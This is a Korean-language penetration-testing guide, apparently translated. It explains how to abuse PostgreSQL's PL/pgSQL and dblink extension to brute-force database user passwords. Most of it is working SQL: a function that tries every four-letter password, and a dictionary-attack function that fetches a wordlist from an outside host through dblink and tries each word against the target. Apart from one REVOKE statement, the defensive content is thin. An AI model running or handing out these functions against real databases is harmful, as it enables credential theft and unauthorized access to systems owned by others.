PL/pgSQL은 절차적 제어를 향상시켜 SQL의 기능을 넘어서는 완전한 프로그래밍 언어입니다. 여기에는 루프 및 다양한 제어 구조의 활용이 포함됩니다. PL/pgSQL 언어로 작성된 함수는 SQL 문 및 트리거에 의해 호출될 수 있어 데이터베이스 환경 내에서의 작업 범위를 넓힙니다.
이 언어를 악용하여 PostgreSQL에 사용자 자격 증명을 무차별 대입하도록 요청할 수 있지만, 데이터베이스에 존재해야 합니다. 존재 여부는 다음을 사용하여 확인할 수 있습니다:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
기본적으로, 함수를 생성하는 것은 PUBLIC에게 부여된 권한입니다, 여기서 PUBLIC은 해당 데이터베이스 시스템의 모든 사용자를 의미합니다. 이를 방지하기 위해, 관리자는 PUBLIC 도메인에서 USAGE 권한을 철회해야 했을 것입니다:
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
그 경우, 우리의 이전 쿼리는 다른 결과를 출력할 것입니다:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
다음 스크립트가 작동하려면 dblink 함수가 존재해야 합니다. 존재하지 않는 경우 다음을 사용하여 생성해 볼 수 있습니다.
CREATE EXTENSION dblink;
비밀번호 무차별 대입 공격
다음은 4자리 비밀번호 무차별 대입 공격을 수행하는 방법입니다:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
4자리를 무차별 대입하는 것조차 몇 분이 걸릴 수 있음을 유의하세요.
또한 단어 목록을 다운로드하고 해당 비밀번호만 시도할 수 있습니다(사전 공격):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');